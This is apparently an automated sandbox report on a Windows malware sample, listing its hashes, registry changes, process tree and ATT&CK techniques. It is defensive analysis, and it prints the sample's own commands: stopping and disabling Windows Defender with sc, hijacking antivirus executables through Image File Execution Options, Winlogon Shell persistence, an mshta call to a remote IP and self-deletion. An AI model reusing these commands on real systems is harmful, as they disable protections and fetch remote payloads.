Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
01-02-2024 11:36
Static task
static1
Behavioral task
behavioral1
Sample
86cb950715ad71b2402b2fe150628553.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
86cb950715ad71b2402b2fe150628553.exe
Resource
win10v2004-20231215-en
General
-
Target
86cb950715ad71b2402b2fe150628553.exe
-
Size
2.3MB
-
MD5
86cb950715ad71b2402b2fe150628553
-
SHA1
78d2ce589f3cf9d3f4ffcd324de66e8aa8121cd4
-
SHA256
c1dc466996191c195b0fb016f3ccdce5d4aab00d92ba3d35e39fa4a807898a49
-
SHA512
3ee77c8e63cac15384783f86d611058a6fe46f09b93403d8397fdb776ed26c8828530354cb5beb7e1a71e3b3a2728da49ebf77263e7a3a020b368cbeeb9fee98
-
SSDEEP
49152:BBIk5IEDI0ZnJUczjRO4Ye47YfW5I5GWMo/4aINponYf:BBIbSHUczjfBGeF/4aINpmYf
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=QVMRJQQO&2=i-s&3=53&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\xehvlu.exe" xehvlu.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2840 mshta.exe 7 2840 mshta.exe -
Sets file execution options in registry 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" 86cb950715ad71b2402b2fe150628553.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" 86cb950715ad71b2402b2fe150628553.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" xehvlu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" xehvlu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe 86cb950715ad71b2402b2fe150628553.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" 86cb950715ad71b2402b2fe150628553.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe xehvlu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe xehvlu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" xehvlu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" 86cb950715ad71b2402b2fe150628553.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe 86cb950715ad71b2402b2fe150628553.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" 86cb950715ad71b2402b2fe150628553.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe 86cb950715ad71b2402b2fe150628553.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe xehvlu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" xehvlu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe 86cb950715ad71b2402b2fe150628553.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe xehvlu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" xehvlu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe xehvlu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe 86cb950715ad71b2402b2fe150628553.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 1488 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3004 xehvlu.exe -
Loads dropped DLL 2 IoCs
pid Process 2600 86cb950715ad71b2402b2fe150628553.exe 2600 86cb950715ad71b2402b2fe150628553.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2684 sc.exe 2560 sc.exe 736 sc.exe 620 sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3004 xehvlu.exe Token: SeShutdownPrivilege 3004 xehvlu.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe 3004 xehvlu.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3004 xehvlu.exe 3004 xehvlu.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2600 wrote to memory of 2684 2600 86cb950715ad71b2402b2fe150628553.exe 28 PID 2600 wrote to memory of 2684 2600 86cb950715ad71b2402b2fe150628553.exe 28 PID 2600 wrote to memory of 2684 2600 86cb950715ad71b2402b2fe150628553.exe 28 PID 2600 wrote to memory of 2684 2600 86cb950715ad71b2402b2fe150628553.exe 28 PID 2600 wrote to memory of 2560 2600 86cb950715ad71b2402b2fe150628553.exe 29 PID 2600 wrote to memory of 2560 2600 86cb950715ad71b2402b2fe150628553.exe 29 PID 2600 wrote to memory of 2560 2600 86cb950715ad71b2402b2fe150628553.exe 29 PID 2600 wrote to memory of 2560 2600 86cb950715ad71b2402b2fe150628553.exe 29 PID 2600 wrote to memory of 3004 2600 86cb950715ad71b2402b2fe150628553.exe 32 PID 2600 wrote to memory of 3004 2600 86cb950715ad71b2402b2fe150628553.exe 32 PID 2600 wrote to memory of 3004 2600 86cb950715ad71b2402b2fe150628553.exe 32 PID 2600 wrote to memory of 3004 2600 86cb950715ad71b2402b2fe150628553.exe 32 PID 2600 wrote to memory of 1488 2600 86cb950715ad71b2402b2fe150628553.exe 33 PID 2600 wrote to memory of 1488 2600 86cb950715ad71b2402b2fe150628553.exe 33 PID 2600 wrote to memory of 1488 2600 86cb950715ad71b2402b2fe150628553.exe 33 PID 2600 wrote to memory of 1488 2600 86cb950715ad71b2402b2fe150628553.exe 33 PID 3004 wrote to memory of 736 3004 xehvlu.exe 35 PID 3004 wrote to memory of 736 3004 xehvlu.exe 35 PID 3004 wrote to memory of 736 3004 xehvlu.exe 35 PID 3004 wrote to memory of 736 3004 xehvlu.exe 35 PID 3004 wrote to memory of 620 3004 xehvlu.exe 36 PID 3004 wrote to memory of 620 3004 xehvlu.exe 36 PID 3004 wrote to memory of 620 3004 xehvlu.exe 36 PID 3004 wrote to memory of 620 3004 xehvlu.exe 36 PID 3004 wrote to memory of 2840 3004 xehvlu.exe 39 PID 3004 wrote to memory of 2840 3004 xehvlu.exe 39 PID 3004 wrote to memory of 2840 3004 xehvlu.exe 39 PID 3004 wrote to memory of 2840 3004 xehvlu.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\86cb950715ad71b2402b2fe150628553.exe"C:\Users\Admin\AppData\Local\Temp\86cb950715ad71b2402b2fe150628553.exe"1⤵
- Sets file execution options in registry
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2560
-
-
C:\Users\Admin\AppData\Roaming\xehvlu.exeC:\Users\Admin\AppData\Roaming\xehvlu.exe2⤵
- Modifies WinLogon for persistence
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:736
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:620
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=QVMRJQQO&2=i-s&3=53&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\86CB95~1.EXE" >> NUL2⤵
- Deletes itself
PID:1488
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD586cb950715ad71b2402b2fe150628553
SHA178d2ce589f3cf9d3f4ffcd324de66e8aa8121cd4
SHA256c1dc466996191c195b0fb016f3ccdce5d4aab00d92ba3d35e39fa4a807898a49
SHA5123ee77c8e63cac15384783f86d611058a6fe46f09b93403d8397fdb776ed26c8828530354cb5beb7e1a71e3b3a2728da49ebf77263e7a3a020b368cbeeb9fee98